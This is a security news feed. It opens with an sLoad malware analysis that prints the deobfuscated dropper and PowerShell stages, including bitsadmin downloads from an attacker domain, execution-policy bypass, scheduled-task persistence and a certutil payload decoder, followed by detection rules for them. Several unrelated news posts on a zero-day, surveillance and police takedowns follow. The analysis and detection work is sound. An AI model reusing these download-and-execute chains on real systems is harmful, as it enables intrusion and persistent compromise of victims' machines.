Ssdeep: 1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the VBS dropper reveals an obfuscated script padded with junk instructions, such as unused variables and commented-out code. After deobfuscation the inner logic is plain: the script launches a PowerShell script retrieved from the attacker’s infrastructure and, in the meantime, opens the PDF files it finds on disk as a decoy for the victim.

On Error Resume Next
Set ZCzG = CreateObject("Scripting.FileSystemObject")
Set PavfQt = WScript.CreateObject("WScript.Shell")
Set XaiX = ZCzG.GetFolder("c:\Users\")
' Decoy: open every .pdf found under c:\Users so the victim sees a document
Recurse(XaiX)
' Fetch the fake "jpg" (really a PowerShell script) with the native BITS client
PavfQt.run "bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",0,True
' Poll until the download has landed on disk
i=0
Do While i < 1
    If (ZCzG.FileExists("c:\Users\Public\Downloads\RSbYHuPO.ps1")) Then
        i=1
    End If
    WScript.Sleep(2280)
Loop
PavfQt.run "powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",0,True

Sub Recurse(JFLY)
    If IsAccessible(JFLY) Then
        For Each oSubFolder In JFLY.SubFolders
            Recurse oSubFolder
        Next
        For Each RIst In JFLY.Files
            If InStr(RIst.Name,".pdf") > 0 Then
                PavfQt.run "explorer "+JFLY+"\"+RIst.Name
            End if
        Next
    End If
End Sub

Function IsAccessible(XaiX)
    On Error Resume Next
    IsAccessible = (XaiX.SubFolders.Count >= 0)
End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg with the native “bitsadmin.exe” tool from “hxxps://dreamacinc[.]com/UCP9dATGyt6mJ/srdzHcN4bWUum[.]jpg”. Relying on a built-in utility (a LOLBin) rather than a dropped binary lets the script stay under the radar of several AV controls. The fake jpg is in fact a PowerShell script.

$oLZz2= "C:\Users\admin\AppData\Roaming";
$YwbpkcN9XUIv1w=@(1..16);
[…]
# Encrypted configuration blobs are carried inside the script and dropped to disk
$main_ini='76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA';
$main_ini | out-file $PaIQGLoo'\main.ini';
$domain_ini='76492d1116743f0423413b1605 […] YwBlAA==';
$domain_ini | out-file $PaIQGLoo'\domain.ini';
[…]
# Body of the second-stage .ps1, written to disk as text
try{ […]
}catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
if ($yC0iBerAupzdtf5Z.length -lt 2){
$EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$r=8;
$B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
$zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
$sv8eJJhgWV3xAN7Uu=@(1..16);
$umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
$AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
$DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
Invoke-Expression $DBR4S3t;
}
} | out-file $PaIQGLoo'\'$H3z9RnzIihO8'.ps1'
# Persistence: a scheduled task every 3 minutes that runs the VBScript launcher
$OFHc0H4A=' /F /create /sc minute /mo 3 /TN "S'+$rs+$fLCg9ngJqRHX36hfUr+'" /ST 07:00 /TR "wscript /E:vbscript '+$PaIQGLoo+'\'+$JxdRWnHC+'.tmp"';
start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The script creates a scheduled task (every 3 minutes, under a task name starting with “S”) to gain persistence on the infected machine, and stores four files in its installation folder, obtained by appending the name of a running process (“System” in this infection) to the “%AppData%\Roaming” path:

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; two of them (“domain.ini” and “main.ini”) are encrypted with PowerShell’s “ConvertFrom-SecureString” cmdlet. Because that cmdlet is used with a static “-Key”, the files can be decrypted with “ConvertTo-SecureString” and the same key, which the script itself carries. The script then runs the “UoqOTQrc.tmp” file, a VBScript whose only purpose is to execute the “UoqOTQrc.ps1” file in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
Dim str, min, max
Const LETTERS = "abcdefghijklmnopqrstuvwxyz"
min = 1
max = Len(LETTERS)
Randomize
[…]
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set winssh = WScript.CreateObject("WScript.Shell")
fName=RandomString(10)
JAcalshy=RandomString(4)
fZgxNPDMnu=RandomString(4)
WEHxctVdTEoDfqEqJMP=RandomString(4)
[…]
' Helper file holding fragments of the PowerShell command line in random variable names
Set objFile = objFSO.CreateTextFile(outFile,8, True)
objFile.Write "Set "+JAcalshy+"=rshe" & vbCrLf
objFile.Write "Set "+fZgxNPDMnu+"=ypa" & vbCrLf
objFile.Write "Set "+WEHxctVdTEoDfqEqJMP+"=il" & vbCrLf
objFile.Close
' Launches the sibling .ps1 (its name is elided in the original capture)
winssh.run "powershell -ep bypass -file .ps1",0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

try{
# Bogus command names that always throw, so execution always lands in the catch block
Remove-EventLog:Debug-Job
Export-BinaryMiLog:Get-PSSessionConfiguration
Remove-JobTrigger:New-Item
}catch{
# Run only when no other PowerShell instance (beyond this one) is active
$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
if ($yC0iBerAupzdtf5Z.length -lt 2){
$EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
$B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
$zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
# Static 16-byte key (bytes 0x01..0x10) used for ConvertTo-SecureString
$sv8eJJhgWV3xAN7Uu=@(1..16);
$umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
$AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
$DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
Invoke-Expression $DBR4S3t;
}
}

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc.ps1” script decrypts “main.ini” with “ConvertTo-SecureString” and the key held in the “$sv8eJJhgWV3xAN7Uu” variable, the sequential integer array @(1..16), that is, the 16 bytes 0x01 to 0x10. Since the key is hard-coded, an analyst can decrypt the .ini files offline with the same two cmdlets.

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated by selecting three ASCII character codes in the ranges [65-90] and [97-122] (upper- and lower-case letters). Then it decrypts “domain.ini” using the key in the “$main_key” variable and saves the result in the “btc.log” file. Further along, “main.ini” also gathers system information to check in the newly infected host with the C2.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

$u2K2MQ4 = "`r`n"
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\App'+'Da'+'ta\Ro'+'am'+'ing';
$hh='hi'+'dd'+'en';
$ixXApGeqJKEGY=@(1..16);
$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
# "_in" marker: bail out if another run started in the last 30 minutes
If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";
try{ Remove-Item $Z5lTNXB'\*'}catch{}
$wsxDITPgQCH+='76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA';
[…]
$wsxDITPgQCH+='UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA';
$wsxDITPgQCH+='3ADAANQA1AA==';
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
$5r8DcJB4ok4+='76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA';
[…]
$5r8DcJB4ok4+='YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA';
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
# Disable the task created by the previous stage before registering the new one
start-process -windowstyle $hh schtasks '/change /tn GoFast /disable';
$2aWxu9dutZfOPCCgS+=$u2K2MQ4+'Dim ';
[…]
$nz0oninX6=$ixXApGeqJKEGY -join ',';
$E6M6Np8nhXnu4ndPEJ=' /F /create /sc minute /mo 3 /TN "U'+$sOmUGoc0ysV8UW+'" /ST 07:00 /TR "wscript /E:vbscript '+$Z5lTNXB+'\'+$lNlNrKyk+'.tmp"';
start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

$u2K2MQ4 = "`r`n";
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\AppData\Roaming';
$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
# Installation folder is named after the first six characters of the machine UUID
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";
try{ Remove-Item $Z5lTNXB'\*'}catch{}
$wsxDITPgQCH="76492d1 […] A1AA==";
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
$5r8DcJB4ok4="7649 […] AGIA";
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
start-process -windowstyle hidden schtasks '/change /tn GoFast /disable';
# VBScript launcher, written verbatim to <random_name>.tmp
$2aWxu9dutZfOPCCgS='Dim winssh […] winssh.run "powershell -ep bypass -file vJjFwtSM.ps1",0,true';
$2aWxu9dutZfOPCCgS | out-file $Z5lTNXB'\'$lNlNrKyk'.tmp'
# PowerShell decryptor, written verbatim to <random_name>.ps1
$r1uIiPZBhUea0=' $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}';
$r1uIiPZBhUea0 | out-file $Z5lTNXB'\'$lNlNrKyk'.ps1'
$nz0oninX6="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16";
$E6M6Np8nhXnu4ndPEJ='/F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp"';
start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like the previous script, this one performs the same operations and creates another four files. Here the deobfuscated code shows that the folder is “%AppData%\Roaming\<first six characters of the machine UUID>” (“52A34D” in this sample). This time the files are:

  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

Figure 7: Files created in the installation folder

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is to launch “<random_name>.ps1”, which in turn decrypts the content of “config.ini”. The following figure shows “config.ini” both encrypted and decrypted.

Figure 8: “config.ini” file before and after decryption

This script performs the same operations described for “main.ini” but uses the URLs stored in the “web.ini” file. Again the file is decrypted with the integer array from 1 to 16 as the key, here held in the “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. At the time of analysis, however, all the C2 URLs were down, so we could not retrieve the final payload or identify its family.

$dPath = [Environment]::GetFolderPath("MyDocuments")
$jerry=$starsLord+'\'+$roccon+'_'+$rp;
# Download with bitsadmin, base64-decode with certutil, launch the .exe, then clean up
$clpsr='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dPath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$roccon+'_'+$rp+'.exe" & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
$clpsr='/C del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dPath+'\'+$roccon+'_'+$rp+'.exe & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload
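The chain above is built almost entirely from signed Microsoft binaries, so the detection opportunity lies in command lines and parent/child relations rather than file hashes. As an added example, not Yoroi’s code, the rules below encode the stages shown in the snippets (bitsadmin fetching an “image” into a .ps1, a script host spawning “powershell -ep bypass -file”, the 3-minute schtasks/wscript task, certutil -decode) and run them over constructed process creation events; the field names and the placeholder URLs are assumptions.

```python
"""Detection logic for the sLoad chain dissected above, run over process
creation events (the fields a Sysmon event 1 or a 4688 record gives you).
Added example, not Yoroi's code; the events are constructed from the command
lines shown in the analysis, with download URLs replaced by placeholders."""
import re

# (rule name, image name the rule applies to or None, command-line pattern)
RULES = [
    # bitsadmin fetching an "image" URL straight into a script file (snippet 1)
    ("bitsadmin_image_to_script", None,
     r"bitsadmin(\.exe)?\s+/transfer\b.*\.(jpe?g|png|gif)\s+\S+\.(ps1|vbs|tmp)\b"),
    # powershell -ep bypass -file <script> (snippets 1, 3 and 6)
    ("powershell_bypass_file", r"powershell(\.exe)?$",
     r"-e(p|xecutionpolicy)\s+bypass\b.*-file\b"),
    # 3-minute scheduled task whose action is wscript on a .tmp (snippets 2 and 6)
    ("schtasks_minute_vbscript", r"schtasks(\.exe)?$",
     r'/create\b.*/sc\s+minute\b.*/tr\s+"?wscript\s+/e:vbscript\b.*\.tmp\b'),
    # wscript executing a .tmp file as VBScript (the task firing)
    ("wscript_runs_tmp", r"wscript(\.exe)?$", r"/e:vbscript\b.*\.tmp\b"),
    # certutil used as a base64 decoder in the final-payload stage (snippet 7)
    ("certutil_decode", None, r"certutil(\.exe)?\s+-decode\b"),
]
COMPILED = [(n, re.compile(i, re.I) if i else None, re.compile(c, re.I)) for n, i, c in RULES]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def match_rules(event):
    """Return the names of every rule the event trips."""
    hits = []
    image = event["image"].lower()
    for name, image_re, cmd_re in COMPILED:
        if image_re and not image_re.search(image):
            continue
        if cmd_re.search(event["cmdline"]):
            hits.append(name)
    # Parent/child relation: a script host spawning PowerShell is how the
    # dropper hands off to the downloaded .ps1.
    if event["parent"].lower() in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("script_host_spawned_powershell")
    return hits


def scan(events):
    """Events with at least one hit, in order."""
    out = []
    for e in events:
        hits = match_rules(e)
        if hits:
            out.append({"ts": e["ts"], "image": e["image"], "hits": hits})
    return out


def chain_score(events):
    """Number of distinct stages seen on a host: several together is the sLoad
    chain, one alone (say, a lone certutil -decode) is only a lead."""
    return len({h for e in events for h in match_rules(e)})


SAMPLE_EVENTS = [  # constructed; URLs are placeholders
    {"ts": "2019-09-20T09:14:02", "parent": "wscript.exe", "image": "bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://cdn.example.invalid/img/photo.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1"},
    {"ts": "2019-09-20T09:14:09", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1"},
    {"ts": "2019-09-20T09:14:11", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": r'schtasks /F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp"'},
    {"ts": "2019-09-20T09:17:00", "parent": "svchost.exe", "image": "wscript.exe",
     "cmdline": r"wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp"},
    {"ts": "2019-09-20T09:17:04", "parent": "powershell.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /C bitsadmin /transfer a1 /download /priority FOREGROUND https://c2.example.invalid/p.txt C:\Users\admin\AppData\Roaming\52A34D\a1.txt & Copy /Z C:\Users\admin\AppData\Roaming\52A34D\a1.txt C:\Users\admin\AppData\Roaming\52A34D\a1_1.txt & certutil -decode C:\Users\admin\AppData\Roaming\52A34D\a1_1.txt C:\Users\admin\Documents\a1.exe & exit"},
    {"ts": "2019-09-20T09:30:00", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["ts"], hit["image"], ", ".join(hit["hits"]))
    print("distinct stages:", chain_score(SAMPLE_EVENTS))
```

Each rule on its own has benign matches (administrators do use schtasks and certutil), which is why the score counts distinct stages per host rather than alerting on any single line; the scheduled task is also the artifact to look for on a machine where the initial events have already rolled out of the log.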

Comparison With Previous Chains

To better understand the evolution of the sLoad infection chain, we compared the attack attempts observed since 2018 with the latest ones. In both cases the infection vector is a carefully themed malicious email weaponized with a zip archive containing two files. In the first case the starting point is a “.lnk” file; in the second the chain starts with a “.vbs” script.

The sLoad attack chain observed months ago was characterized by PowerShell code appended to the tail of the zip archive. This technique probably became easier to detect over time, so it may have been dropped in the latest attempts. In both variants the archive contains a legitimate-looking image (or PDF) used to deceive the unaware user. In the first variant the core of the infection is mainly based on PowerShell scripts and LOLBins, while the latest stages use a mix of PowerShell and Visual Basic scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in its core structure; however, the bot now supports new commands such as “Exec” and “Eval”, the latter able to download further code through the Bitsadmin utility instead of relying directly on the “Net.WebClient” primitive. Also, the “ScreenCapture” function has been removed from the new version of the code, in favor of stronger agent persistence through scheduled tasks.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad keeps evolving its TTPs and represents a vivid threat for the Italian cyber-landscape. Many times, especially in recent months, its activity in the country involved the abuse of certified mailboxes (PEC) to target associated professionals and consultants, along with private companies. The quality of the latest phishing emails is also high: the group adopted templates and naming conventions actually in use by the Italian Revenue Agency (“Agenzia delle Entrate”).

The heavy use of LOLBins, PowerShell scripts and SSL-encrypted channels makes this threat hard for automated systems to detect; tackling sLoad campaigns, which often target a single country, frequently requires analyst skills or high-quality threat intelligence sources.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

Google Project Zero researcher Maddie Stone discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system.

Maddie Stone, a member of the Google elite team Project Zero, discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system. According to the expert, the bug, tracked as CVE-2019-2215, was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability in the Android kernel’s binder driver; it could be exploited by a local privileged attacker or a malicious app to escalate privileges and gain root access to a vulnerable device. Experts warn it could potentially allow an attacker to fully compromise the device.

“There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.” reads the security advisory.

“As described in the upstream commit: ‘binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.’”

The flaw affects versions of the Android kernel released before April last year. The vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that the Pixel 2 with the most recent security bulletin is still vulnerable based on source code review.

This means that most Android devices on the market with the unpatched kernel are still vulnerable, even if their owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is reachable from inside the Chrome sandbox: the issue is exploitable from Chrome’s renderer processes running under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome renderer bug.

“The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.” Stone said.

“I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215.”

Google is expected to release a security patch in its October Android Security Bulletin.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” concludes the Chromium blog. “We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.”

Pierluigi Paganini

(SecurityAffairs – Google, zero-day)

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that the Egyptian government has been spying on citizens as part of a sophisticated surveillance program.

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The experts started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point identified tens of victims who were tricked into downloading the malicious apps, which offered seemingly useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve security; iLoud200%, a smart storage solution that would free up storage space on the victim’s device; and the IndexY caller ID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over time. Attackers used a range of domain names that included words like “secure” and “verify” to avoid raising the victims’ suspicion.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the experts to analyze its content, a collection of files uploaded between May and June.

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims.”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to Egyptian intelligence, despite the nature of the victims, the level of sophistication of the attacks and other evidence, such as a server registered to the Ministry of Communications and Information Technology in Egypt.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

The Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

Cybercrime is a prolific business: criminal organizations continue to profit from illegal activities in cyberspace, but police are ready to counter them. Cyber experts at the Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

“Cyber ​​police officers, together with investigators of the Main Investigative Directorate of the National Police of Ukraine, under the procedural guidance of the Prosecutor General’s Office of Ukraine, exposed a large-scale service for mass distribution of electronic messages.” states the press release published by the Ukrainian police. “It is established that all works of the service are carried out exclusively at the request of interested clients. With this resource, it was possible to buy activated accounts in large numbers to various mail resources, social networks, payment systems and more. At the same time, verified accounts were also sold, the cost of which was much higher.”

Operators behind the bot farm were offering large numbers of active accounts for multiple online services that their customers used to carry out spam campaigns.

The Ukrainian Police raided houses, apartments, garages and rented offices in six Ukrainian cities (Kiev, Odesa, Lviv, Nikolaev, Rivne, and Kherson) and seized equipment used in the bot farm, including multi-SIM card modems and electronic equipment used to sign up to payment systems.

Crooks were using the SIM cards to register accounts on various services that require a phone number to verify users’ identity. Crooks were preserving their anonymity using VPN and Tor services.

Police officers and the Main Investigative Directorate of Ukraine’s National Police carried out searches at houses, apartments, garages and rented offices where the group set up the illegal activity.

To anonymize the bot farm traffic, the operators ran connections through VPN services and the Tor network. Details of how the officers were able to discover the physical addresses remain undisclosed.

Authorities will analyze the seized equipment in an attempt to collect additional information on the crime rings.

“The pre-trial investigation is ongoing within the framework of the previously initiated criminal proceedings under Art. 1889 (Requirement), Art. 258 (Terrorist Act), Art. Measures are being taken to prosecute those involved in the organization of such activities.” concludes the statement.

Today I had the pleasure of writing a post on another successful operation conducted by law enforcement. A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed investigators to track down and seize five servers that made up a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam; they were used by tens of IoT botnets involved in DDoS attacks worldwide.

Pierluigi Paganini

(SecurityAffairs – bot farm, cybercrime)

Dutch police shut down bulletproof service hosting tens of DDoS botnets

Dutch police seized a bulletproof hosting service in a major takedown, the infrastructure was used by tens of IoT botnets involved in DDoS attacks.

A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed investigators to track down and seize five servers that made up a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam; they were used by tens of IoT botnets involved in DDoS attacks worldwide. The bulletproof hosting service was used to host malware and the command and control systems of several DDoS botnets.

“Middelburg, Veendam, Amsterdam, Driebergen – The police has taken five servers offline that were used to control a version of a so-called botnet.” reads the press release published by the Dutch police. “The hardware was seized and the business operations stopped. A 24-year-old man from Veendam and a 28-year-old man from Middelburg were arrested on Tuesday evening. They are suspected of, among other things, computer breach and the spread of malware.”

Authorities revealed that they received more than three thousand reports of malware spread through the bulletproof hosting service over a period of one year.

The authorities also arrested two Dutch nationals who had been running a Mirai botnet from the servers of KV Solutions BV (KV hereinafter) bulletproof hosting service.

In this case, the police say, the people controlling those servers were a pair of Dutch nationals who had been running a Mirai botnet with cover from the bulletproof host.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device. Which DDoS attacks can be attributed to this botnet is part of the further investigation.” continues the statement.

Authorities are analyzing the seized servers and the data they contain will likely lead to the arrests of other players in the cybercrime underground.

Pierluigi Paganini

(SecurityAffairs – bulletproof hosting service, malware)

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

The US continues to warn its allies over China’s “predatory approach”, especially on 5G technology; this time the US Secretary of State alerts Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again the US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries, explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against.”

